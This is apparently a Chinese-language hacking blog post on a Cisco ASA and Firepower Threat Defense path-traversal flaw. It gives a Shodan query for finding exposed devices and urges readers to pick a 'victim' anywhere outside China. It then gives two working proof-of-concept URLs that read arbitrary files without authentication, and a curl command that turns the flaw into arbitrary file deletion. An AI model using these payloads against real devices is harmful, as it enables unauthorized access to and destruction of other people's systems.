简介

Cisco Firepower Threat Defense(FTD)和Cisco Adaptive Security Appliances Software(ASA Software)都是美国思科(Cisco)公司的产品。Cisco Firepower Threat Defense是一套提供下一代防火墙服务的统一软件。Cisco Adaptive Security Appliances Software是一套防火墙和网络安全平台。该平台提供了对数据和网络资源的高度安全的访问等功能。

0x01 漏洞描述

Cisco ASA Software和FTD Software中存在输入验证错误漏洞,该漏洞源于受影响设备没有正确验证HTTP请求中的URL。远程攻击者可通过将包含目录遍历字符序列的特制HTTP请求发送到受影响的设备利用该漏洞在目标设备上查看Web服务文件系统内的任意文件。

0x02 开搞开搞

老规矩,先去shodan上任意寻找一个受害者(别是国内的就行)

1
2
shodan搜索:
Set-Cookie: webvpn;

POC如下

1
2
3
4
5
POC1:
https:// <domain> /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

POC2:
https://<domain>/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua

先来看一下登录界面的样子(要记得哦,后面会有用的):

给出的这两个POC允许未经身份验证在Cisco ASA和Cisco Firepower中读取任意文件,但无法读取OS文件。
如下图所示:

其他还有什么可以读的文件可以自己尝试找找。

接着还发现,通过这个文件遍历漏洞还可以扩展出一个任意文件删除的漏洞。

POC
curl -k -H "Cookie: token=..//+CSCOU+/csco_logo.gif" https://target/+CSCOE+/session_password.html

这里就用Cisco的logo来演示,右击logo图片找到图片地址。

可以通过curl命令,也可以通过bp来执行删除操作,如下图所示:

emmm 大概就是这么一个鸡肋的漏洞(就和CatGhost漏洞一样,单独一个漏洞没太大的利用价值)

POC

这个漏洞需要POC?